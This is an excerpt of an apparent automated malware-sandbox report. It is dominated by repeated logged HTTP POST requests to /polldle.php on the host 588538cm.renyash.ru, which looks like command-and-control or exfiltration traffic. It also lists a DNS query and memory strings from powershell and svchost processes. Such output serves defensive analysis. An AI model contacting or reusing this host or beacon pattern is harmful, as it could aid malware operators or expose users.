                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 1620Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2500Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2500Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 1608Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 1620Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 1620Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2500Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 1608Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2500Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 1620Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2496Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 1596Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 1620Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2500Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficDNS traffic detected: DNS query: 588538cm.renyash.ru
                        Source: unknownHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                        Source: svchost.exe, 00000033.00000003.2218945708.000001D075618000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                        Source: svchost.exe, 00000033.00000003.2218945708.000001D075618000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
                        Source: svchost.exe, 00000033.00000003.2218945708.000001D075618000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                        Source: svchost.exe, 00000033.00000003.2218945708.000001D075618000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                        Source: svchost.exe, 00000033.00000003.2218945708.000001D075618000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                        Source: svchost.exe, 00000033.00000003.2218945708.000001D075618000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                        Source: svchost.exe, 00000033.00000003.2218945708.000001D07564D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                        Source: svchost.exe, 00000033.00000003.2218945708.000001D075691000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                        Source: powershell.exe, 00000028.00000002.2351882057.000001E45BC48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: powershell.exe, 00000009.00000002.2357627682.000002790E237000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2195750455.000001D526ED6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2325076321.000001A0A0538000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2223222287.0000026A80227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2219002158.000002A100226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2323376954.0000018C922D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2304342959.0000026562D38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2327736716.000001A43172F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2306910625.00000231D7A47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2363724550.0000026337B00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2284077439.0000015534C76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2331466618.000001A3E7B77000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2436254861.000002A23FF66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2351859709.00000288C3626000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2196163130.000001DA00227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2383859064.000001F5A3F76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2221324437.0000021500227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2351882057.000001E45BC48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                        Source: ComrefNetsvc.exe, 00000008.00000002.2050934890.0000000002E0E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2357627682.000002790E011000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2195750455.000001D526CB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2325076321.000001A0A0311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2223222287.0000026A80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2219002158.000002A100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2323376954.0000018C920B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2304342959.0000026562B11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2327736716.000001A4314E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2306910625.00000231D7821000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2363724550.00000263378B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2284077439.0000015534A51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2331466618.000001A3E7951000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2436254861.000002A23FD41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2351859709.00000288C3381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2196163130.000001DA00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2383859064.000001F5A3D51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 